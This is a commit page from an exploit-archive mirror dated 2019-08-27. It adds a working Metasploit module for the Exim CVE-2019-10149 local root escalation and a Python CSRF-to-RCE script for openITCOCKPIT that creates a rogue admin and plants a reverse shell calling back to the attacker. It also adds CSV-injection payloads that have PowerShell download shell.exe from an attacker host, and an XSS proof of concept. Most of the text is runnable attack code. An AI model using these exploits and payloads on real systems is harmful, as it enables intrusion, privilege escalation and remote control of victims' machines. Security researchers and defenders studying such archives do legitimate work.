bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2019-08-27

Browse source 
6 changes to exploits/shellcodes

Exim 4.87 / 4.91 - Local Privilege Escalation (Metasploit)
LSoft ListServ < 16.5-2018a - Cross-Site Scripting
WordPress Plugin Import Export WordPress Users 1.3.1 - CSV Injection
WordPress Plugin UserPro 4.9.32 - Cross-Site Scripting
openITCOCKPIT 3.6.1-2 - Cross-Site Request Forgery
This commit is contained in:
Offensive Security 2019-08-27 05:02:18 +00:00
parent 6de82be6dd
commit 6adaedca69
7 changed files with 486 additions and 7 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

261
exploits/linux/local/47307.rb Executable file
View file

@ -0,0 +1,261 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'expect'
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Exploit::FileDropper
include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
def initialize(info = {})
super(update_info(info,
'Name' => 'Exim 4.87 - 4.91 Local Privilege Escalation',
'Description' => %q{
This module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive).
Improper validation of recipient address in deliver_message()
function in /src/deliver.c may lead to command execution with root privileges
(CVE-2019-10149).
},
'License' => MSF_LICENSE,
'Author' =>
[
'Qualys', # Discovery and PoC (@qualys)
'Dennis Herrmann', # Working exploit (@dhn)
'Marco Ivaldi', # Working exploit (@0xdea)
'Guillaume André' # Metasploit module (@yaumn_)
],
'DisclosureDate' => '2019-06-05',
'Platform' => [ 'linux' ],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' =>
[
[
'Exim 4.87 - 4.91',
lower_version: Gem::Version.new('4.87'),
upper_version: Gem::Version.new('4.91')
]
],
'DefaultOptions' =>
{
'PrependSetgid' => true,
'PrependSetuid' => true
},
'References' =>
[
[ 'CVE', '2019-10149' ],
[ 'EDB', '46996' ],
[ 'URL', 'https://www.openwall.com/lists/oss-security/2019/06/06/1' ]
]
))
register_options(
[
OptInt.new('EXIMPORT', [ true, 'The port exim is listening to', 25 ])
])
register_advanced_options(
[
OptBool.new('ForceExploit', [ false, 'Force exploit even if the current session is root', false ]),
OptFloat.new('SendExpectTimeout', [ true, 'Timeout per send/expect when communicating with exim', 3.5 ]),
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
])
end
def base_dir
datastore['WritableDir'].to_s
end
def encode_command(cmd)
'\x' + cmd.unpack('H2' * cmd.length).join('\x')
end
def open_tcp_connection
socket_subsystem = Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket.new(client)
params = Rex::Socket::Parameters.new({
'PeerHost' => '127.0.0.1',
'PeerPort' => datastore['EXIMPORT']
})
begin
socket = socket_subsystem.create_tcp_client_channel(params)
rescue => e
vprint_error("Couldn't connect to port #{datastore['EXIMPORT']}, "\
"are you sure exim is listening on this port? (see EXIMPORT)")
raise e
end
return socket_subsystem, socket
end
def inject_payload(payload)
if session.type == 'meterpreter'
socket_subsystem, socket = open_tcp_connection
tcp_conversation = {
nil => /220/,
'helo localhost' => /250/,
"MAIL FROM:<>" => /250/,
"RCPT TO:<${run{#{payload}}}@localhost>" => /250/,
'DATA' => /354/,
'Received:' => nil,
'.' => /250/
}
begin
tcp_conversation.each do |line, pattern|
Timeout.timeout(datastore['SendExpectTimeout']) do
if line
if line == 'Received:'
for i in (1..31)
socket.puts("#{line} #{i}\n")
end
else
socket.puts("#{line}\n")
end
end
if pattern
socket.expect(pattern)
end
end
end
rescue Rex::ConnectionError => e
fail_with(Failure::Unreachable, e.message)
rescue Timeout::Error
fail_with(Failure::TimeoutExpired, 'SendExpectTimeout maxed out')
ensure
socket.puts("QUIT\n")
socket.close
socket_subsystem.shutdown
end
else
unless cmd_exec("/bin/bash -c 'exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}' "\
"&& echo true").chomp.to_s == 'true'
fail_with(Failure::NotFound, "Port #{datastore['EXIMPORT']} is closed")
end
bash_script = %|
#!/bin/bash
exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}
read -u 3 && echo $REPLY
echo "helo localhost" >&3
read -u 3 && echo $REPLY
echo "mail from:<>" >&3
read -u 3 && echo $REPLY
echo 'rcpt to:<${run{#{payload}}}@localhost>' >&3
read -u 3 && echo $REPLY
echo "data" >&3
read -u 3 && echo $REPLY
for i in $(seq 1 30); do
echo 'Received: $i' >&3
done
echo "." >&3
read -u 3 && echo $REPLY
echo "quit" >&3
read -u 3 && echo $REPLY
|
@bash_script_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))
write_file(@bash_script_path, bash_script)
register_file_for_cleanup(@bash_script_path)
chmod(@bash_script_path)
cmd_exec("/bin/bash -c \"#{@bash_script_path}\"")
end
print_status('Payload sent, wait a few seconds...')
Rex.sleep(5)
end
def check_for_bash
unless command_exists?('/bin/bash')
fail_with(Failure::NotFound, 'bash not found')
end
end
def on_new_session(session)
super
if session.type == 'meterpreter'
session.core.use('stdapi') unless session.ext.aliases.include?('stdapi')
session.fs.file.rm(@payload_path)
else
session.shell_command_token("rm -f #{@payload_path}")
end
end
def check
if session.type == 'meterpreter'
begin
socket_subsystem, socket = open_tcp_connection
rescue
return CheckCode::Safe
end
res = socket.gets
socket.close
socket_subsystem.shutdown
else
check_for_bash
res = cmd_exec("/bin/bash -c 'exec 3</dev/tcp/localhost/#{datastore['EXIMPORT']} && "\
"(read -u 3 && echo $REPLY) || echo false'")
if res == 'false'
vprint_error("Couldn't connect to port #{datastore['EXIMPORT']}, "\
"are you sure exim is listening on this port? (see EXIMPORT)")
return CheckCode::Safe
end
end
if res =~ /Exim ([0-9\.]+)/i
version = Gem::Version.new($1)
vprint_status("Found exim version: #{version}")
if version >= target[:lower_version] && version <= target[:upper_version]
return CheckCode::Appears
else
return CheckCode::Safe
end
end
CheckCode::Unknown
end
def exploit
if is_root?
unless datastore['ForceExploit']
fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
end
end
unless writable?(base_dir)
fail_with(Failure::BadConfig, "#{base_dir} is not writable")
end
if nosuid?(base_dir)
fail_with(Failure::BadConfig, "#{base_dir} is mounted nosuid")
end
unless datastore['PrependSetuid'] && datastore['PrependSetgid']
fail_with(Failure::BadConfig, 'PrependSetuid and PrependSetgid must both be set to true in order ' \
'to get root privileges.')
end
if session.type == 'shell'
check_for_bash
end
@payload_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))
write_file(@payload_path, payload.encoded_exe)
register_file_for_cleanup(@payload_path)
inject_payload(encode_command("/bin/sh -c 'chown root #{@payload_path};"\
"chmod 4755 #{@payload_path}'"))
unless setuid?(@payload_path)
fail_with(Failure::Unknown, "Couldn't escalate privileges")
end
cmd_exec("#{@payload_path} & echo ")
end
end

19
exploits/linux/remote/47230.rb
View file

@ -11,14 +11,19 @@ class MetasploitModule < Msf::Exploit::Remote
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => 'Webmin 1.920 Unauthenticated RCE', 'Name' => 'Webmin 1.920 Unauthenticated RCE',
'Description' => %q( 'Description' => %q{
This module exploits an arbitrary command execution vulnerability in Webmin This module exploits a backdoor in Webmin versions 1.890 through 1.920.
1.920 and prior versions. If the password change module is turned on, the unathenticated user Only the SourceForge downloads were backdoored, but they are listed as
can execute arbitrary commands with root privileges. official downloads on the project's site.
/////// This 0day has been published at DEFCON-AppSec Village. ///////
), Unknown attacker(s) inserted Perl qx statements into the build server's
source code on two separate occasions: once in April 2018, introducing
the backdoor in the 1.890 release, and in July 2018, reintroducing the
backdoor in releases 1.900 through 1.920.
Only version 1.890 is exploitable in the default install. Later affected
versions require the expired password changing feature to be enabled.
},
'Author' => [ 'Author' => [
'AkkuS <Özkan Mustafa Akkuş>' # Discovery & PoC & Metasploit module @ehakkus 'AkkuS <Özkan Mustafa Akkuş>' # Discovery & PoC & Metasploit module @ehakkus
], ],

48
exploits/php/webapps/47303.txt Normal file
View file

@ -0,0 +1,48 @@
# Exploit Title: Wordpress Plugin Import Export WordPress Users <= 1.3.1 - CSV Injection
# Exploit Author: Javier Olmedo
# Contact: @jjavierolmedo
# Website: https://sidertia.com
# Date: 2018-08-22
# Google Dork: inurl:"/wp-content/plugins/users-customers-import-export-for-wp-woocommerce"
# Vendor: WebToffee
# Software Link: https://downloads.wordpress.org/plugin/users-customers-import-export-for-wp-woocommerce.1.3.1.zip
# Affected Version: 1.3.1 and before
# Active installations: +20,000
# Patched Version: update to 1.3.2 version
# Category: Web Application
# Platform: PHP
# Tested on: Win10x64
# CVE: 2019-15092
# References:
# https://hackpuntes.com/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection/
# https://medium.com/bugbountywriteup/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection-b5cc14535787
# 1. Technical Description
# Wordpress Plugin Import Export WordPress Users version 1.3.1. and before are affected by Remote Code
# Execution through the CSV injection vulnerability. This allows any application user to inject commands
# as part of the fields of his profile and these commands are executed when a user with greater privilege
# exports the data in CSV and opens that file on his machine.
# 2. Vulnerable code
# The function do_export() from WF_CustomerImpExpCsv_Exporter class does not check if fields beggings
# with (=, +, -, @) characters so the fields name, surname, alias or display_name are vulnerable to CSV Injection.
# 3. Proof Of Concept (PoC)
# 3.1 Login with subscriber user and change the fields First name, Surname and Alias with payloads.
# 3.2 Login with a high privileges user and export all users to CSV.
# 3.3 When the user with high privileges logs in to the application, export data in CSV and opens the
# generated file, the command is executed and the shell will run open on the machine.
# 4. Payloads
=cmd|'/C powershell IEX(wget http://ATTACKER/shell.exe)'!A0
+cmd|'/C powershell IEX(wget http://ATTACKER/shell.exe)'!A0
-cmd|'/C powershell IEX(wget http://ATTACKER/shell.exe)'!A0
@cmd|'/C powershell IEX(wget http://ATTACKER/shell.exe)'!A0
# 5. Timeline
# 15, august 2019 - [RESEARCHER] Discover
# 15, august 2019 - [RESEARCHER] Report to Webtoffee support
# 16, august 2019 - [DEVELOPER] More information request
# 16, august 2019 - [RESEARCHER] Detailed vulnerability report
# 19, august 2019 - [DEVELOPER] Unrecognized vulnerability
# 22, august 2019 - [RESEARCHER] Public disclosure

27
exploits/php/webapps/47304.txt Normal file
View file

@ -0,0 +1,27 @@
# Exploit Title: UserPro <= 4.9.32 Reflected XSS
# Google Dork: intitle:"Index of" intitle:"UserPro" -uploads
# Date: 25 August 2019
# Exploit Author: Damian Ebelties (https://zerodays.lol/)
# Vendor Homepage: https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681
# Version: <= 4.9.32
# Tested on: Ubuntu 18.04.1
# CVE: CVE-2019-14470
The WordPress plug-in 'UserPro' uses a Instagram library (Instagram PHP API V2 by cosenary) that
is vulnerable for Reflected Cross-Site Scripting (XSS).
There is more vulnerable code in 'UserPro' core, might release that later.
As of today (25 August 2019) this issue is unfixed.
Vulnerable code: (success.php on line 36)
if (isset($_GET['error'])) {
echo 'An error occurred: ' . $_GET['error_description'];
}
> https://github.com/cosenary/Instagram-PHP-API/blob/master/example/success.php#L36
Proof-of-Concept:
https://domain.tld/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=<PAYLOAD>

110
exploits/php/webapps/47305.py Executable file
View file

@ -0,0 +1,110 @@
# Exploit Title: openITCOCKPIT 3.6.1-2 - CSRF 2 RCE
# Google Dork: N/A
# Date: 26-08-2019
# Exploit Author: Julian Rittweger
# Vendor Homepage: https://openitcockpit.io/
# Software Link: https://github.com/it-novum/openITCOCKPIT/releases/tag/openITCOCKPIT-3.6.1-2
# Fixed in: 3.7.1 | https://github.com/it-novum/openITCOCKPIT/releases
# Version: 3.6.1-2
# Tested on: Debian 9
# CVE : 2019-10227
# Exploit Requirements: pip3 install bs4 requests && apt install netcat
#!/usr/bin/env python
import requests, urllib3, os
import http.server, socketserver
from bs4 import BeautifulSoup as bs
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
print("""
--
openITCOCKPIT v.3.6.1-2
[CSRF 2 RCE]
--
""")
# Setup values
RHOST = input('[x] Enter IP of remote machine: ')
LHOST = input('[x] Enter IP of local machine: ')
RPORT = int(input('[x] Enter local port (back-connection): '))
LPORT = int(input('[x] Enter local port (payload-hosting): '))
print('[-] Generating CSRF form using the following credentials: "hacked@oicp.app - letmein1337" ..')
# Generate file which serves CSRF payload
pl = open('./index.html', 'w')
# Register HTTP server
handler = http.server.SimpleHTTPRequestHandler
csrf = """
<iframe style="display:none;" name="csrff"></iframe>
<form method="post" action="https://""" + RHOST + """/users/add" target="csrff" style="display:none;">
<input type="text" name="_method" value="POST">
<input type="text" name="data[User][Container][]" value="1">
<input type="text" name="data[ContainerUserMembership][1]" value="2">
<input type="text" name="data[User][usergroup_id]" value="1">
<input type="text" name="data[User][status]" value="1">
<input type="text" name="data[User][email]" value="hacked@oicp.app">
<input type="text" name="data[User][firstname]" value="Mr">
<input type="text" name="data[User][lastname]" value="Nice">
<input type="text" name="data[User][new_password]" value="letmein1337">
<input type="text" name="data[User][confirm_new_password]" value="letmein1337">
<input type="submit">
</form>
<script>
function Redirect() {
window.location="https://""" + RHOST + """/login/logout";
}
document.forms[0].submit();
setTimeout('Redirect()', 3000);
</script>
"""
pl.write(csrf)
pl.close()
httpd = socketserver.TCPServer(("", LPORT), handler)
# Start HTTP server, quit on keyboard interrupt
try:
print('[!] Serving payload at port : ' + str(LPORT) + ', press STRG+C if you registered requests!')
print('[!] Send this URL to a logged-in administrator: http://' + LHOST + ':' + str(LPORT))
httpd.serve_forever()
except KeyboardInterrupt:
httpd.socket.close()
print('\n[-] Starting exploitation ..')
print('[-] Logging in ..')
# Proceed login with generated credentials
c = requests.post('https://' + RHOST + '/login/login', data={'_method' : 'POST', 'data[LoginUser][username]' : 'hacked@oicp.app', 'data[LoginUser][password]' : 'letmein1337'}, verify=False, allow_redirects=False).headers['Set-Cookie']
print('[!] Received cookie: ' + c.split(';')[0])
print('[-] Creating reverse-shell as macro ..')
# Insert a new macro identified as $USER99$
makro = {'_method' : 'POST', 'data[0][Macro][id]' : 1, 'data[0][Macro][name]' : '$USER1$', 'data[0][Macro][value]' : '/opt/openitc/nagios/libexec', 'data[0][Macro][description]' : 'default', 'data[0][Macro][password]' : 0, 'data[1][Macro][id]' : 2, 'data[1][Macro][name]' : '$USER99$', 'data[1][Macro][value]' : "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"" + LHOST + "\"," + str(RPORT) + "));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'", 'data[1][Macro][password]' : 1}
requests.post('https://' + RHOST + '/macros', data=makro, verify=False, cookies={'itnovum' : c.split(';')[0].split('=')[1]})
print('[-] Inserting macro as command ..')
# Register a new command using the inserted macro
requests.post('https://' + RHOST + '/commands/add/_controller:commands/_action:hostchecks', data={'_method' : 'POST', 'data[Command][command_type]' : 2, 'data[Command][name]' : 'pwned', 'data[Command][command_line]' : '$USER99$'}, verify=False, cookies={'itnovum' : c.split(';')[0].split('=')[1]})
h = bs(requests.get('https://' + RHOST + '/commands/hostchecks', verify=False, cookies={'itnovum' : c.split(';')[0].split('=')[1]}).text, 'html.parser')
ids = []
# Fetch current commands by ID
for i in h.find_all('form', {'action': lambda x : x.startswith('/commands/delete')}):
ids.append(i.get('action').split('/')[-1])
print('[!] ID of command identified as: ' + str(ids[-1]))
print('[-] Updating default host ..')
# Update host, using the new malicious "hostcheck" command
sett = {'_method':'POST','data[Host][id]':'1','data[Host][container_id]':'1','data[Host][shared_container]':'','data[Host][hosttemplate_id]':'1','data[Host][name]':'localhost','data[Host][description]':'default+host','data[Host][address]':'127.0.0.1','data[Host][Hostgroup]':'','data[Host][Parenthost]':'','data[Host][notes]':'','data[Host][host_url]':'','data[Host][priority]':'1','data[Host][tags]':'','data[Host][notify_period_id]':'1','data[Host][notification_interval]':'0','data[Host][notification_interval]':'0','data[Host][notify_on_recovery]':'0','data[Host][notify_on_recovery]':'1','data[Host][notify_on_down]':'0','data[Host][notify_on_unreachable]':'0','data[Host][notify_on_unreachable]':'1','data[Host][notify_on_flapping]':'0','data[Host][notify_on_downtime]':'0','data[Host][active_checks_enabled]':'0','data[Host][active_checks_enabled]':'1','data[Host][Contact]':'','data[Host][Contact][]':'1','data[Host][Contactgroup]':'','data[Host][command_id]':ids[-1],'data[Host][check_period_id]':'1','data[Host][max_check_attempts]':'3','data[Host][check_interval]':'120','data[Host][check_interval]':'120','data[Host][retry_interval]':'120','data[Host][retry_interval]':'120','data[Host][flap_detection_enabled]':'0','data[Host][flap_detection_on_up]':'0','data[Host][flap_detection_on_down]':'0', 'data[Host][flap_detection_on_unreachable]' : 0}
requests.post('https://' + RHOST + '/hosts/edit/1/_controller:hosts/_action:browser/_id:1/', data=sett, verify=False, cookies={'itnovum' : c.split(';')[0].split('=')[1]})
# Refresh host configuration
print('[-] Refreshing host configuration ..')
requests.get('https://' + RHOST + '/exports/launchExport/0.json', verify=False, cookies={'itnovum' : c.split(';')[0].split('=')[1]}, headers={'X-Requested-With' : 'XMLHttpRequest'})
print('[!] Done! Enjoy your shell (popup in approx. 30s): ')
# We did it!
os.system('nc -lvp ' + str(RPORT))

23
exploits/windows/webapps/47302.txt Normal file
View file

@ -0,0 +1,23 @@
# Exploit Title: LSoft ListServ < 16.5 - Cross-Site Scripting (XSS)
# Google Dork: intitle:LISTSERV 16.5
# Date: 08-21-2019
# Exploit Author: MTK (http://mtk911.cf/)
# Vendor Homepage: http://www.lsoft.com/
# Softwae Link: http://www.lsoft.com/products/listserv.asp
# Version: Older than Ver 16.5-2018a
# Tested on: IIS 8.5/10.0 - Firefox/Windows
# CVE : CVE-2019-15501
# Software description:
The term Listserv has been used to refer to electronic mailing list software applications in general,
but is more properly applied to a few early instances of such software, which allows a sender to send one
email to the list, and then transparently sends it on to the addresses of the subscribers to the list.
# POC
1. http://127.0.0.1/scripts/wa.exe?OK=<PAYLOAD>
2. http://127.0.0.1/scripts/wa.exe?OK=<svg/onload=%26%23097lert%26lpar;'MTK')>
# References:
1. http://www.lsoft.com/manuals/16.5/LISTSERV16.5-2018a_WhatsNew.pdf
2. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15501

5
files_exploits.csv
View file

@ -10661,6 +10661,7 @@ id,file,description,date,author,type,platform,port
47238,exploits/windows/local/47238.ps1,"Steam Windows Client - Local Privilege Escalation",2019-08-12,AbsoZed,local,windows, 47238,exploits/windows/local/47238.ps1,"Steam Windows Client - Local Privilege Escalation",2019-08-12,AbsoZed,local,windows,
47253,exploits/windows/local/47253.cpp,"Microsoft Windows 10 AppXSvc Deployment Service - Arbitrary File Deletion",2019-08-14,"Abdelhamid Naceri",local,windows, 47253,exploits/windows/local/47253.cpp,"Microsoft Windows 10 AppXSvc Deployment Service - Arbitrary File Deletion",2019-08-14,"Abdelhamid Naceri",local,windows,
47258,exploits/windows/local/47258.txt,"Microsoft Windows Text Services Framework MSCTF - Multiple Vulnerabilities",2019-08-15,"Google Security Research",local,windows, 47258,exploits/windows/local/47258.txt,"Microsoft Windows Text Services Framework MSCTF - Multiple Vulnerabilities",2019-08-15,"Google Security Research",local,windows,
47307,exploits/linux/local/47307.rb,"Exim 4.87 / 4.91 - Local Privilege Escalation (Metasploit)",2019-08-26,Metasploit,local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -41658,3 +41659,7 @@ id,file,description,date,author,type,platform,port
47294,exploits/php/webapps/47294.txt,"YouPHPTube 7.2 - 'userCreate.json.php' SQL Injection",2019-08-19,"Fabian Mosch",webapps,php,80 47294,exploits/php/webapps/47294.txt,"YouPHPTube 7.2 - 'userCreate.json.php' SQL Injection",2019-08-19,"Fabian Mosch",webapps,php,80
47295,exploits/php/webapps/47295.html,"WordPress Add Mime Types Plugin 2.2.1 - Cross-Site Request Forgery",2019-08-20,"Princy Edward",webapps,php, 47295,exploits/php/webapps/47295.html,"WordPress Add Mime Types Plugin 2.2.1 - Cross-Site Request Forgery",2019-08-20,"Princy Edward",webapps,php,
47301,exploits/multiple/webapps/47301.txt,"Nimble Streamer 3.0.2-2 < 3.5.4-9 - Directory Traversal",2019-08-23,MaYaSeVeN,webapps,multiple, 47301,exploits/multiple/webapps/47301.txt,"Nimble Streamer 3.0.2-2 < 3.5.4-9 - Directory Traversal",2019-08-23,MaYaSeVeN,webapps,multiple,
47302,exploits/windows/webapps/47302.txt,"LSoft ListServ < 16.5-2018a - Cross-Site Scripting",2019-08-26,MTK,webapps,windows,
47303,exploits/php/webapps/47303.txt,"WordPress Plugin Import Export WordPress Users 1.3.1 - CSV Injection",2019-08-26,"Javier Olmedo",webapps,php,80
47304,exploits/php/webapps/47304.txt,"WordPress Plugin UserPro 4.9.32 - Cross-Site Scripting",2019-08-26,"Damian Ebelties",webapps,php,80
47305,exploits/php/webapps/47305.py,"openITCOCKPIT 3.6.1-2 - Cross-Site Request Forgery",2019-08-26,"Julian Rittweger",webapps,php,80

Can't render this file because it is too large.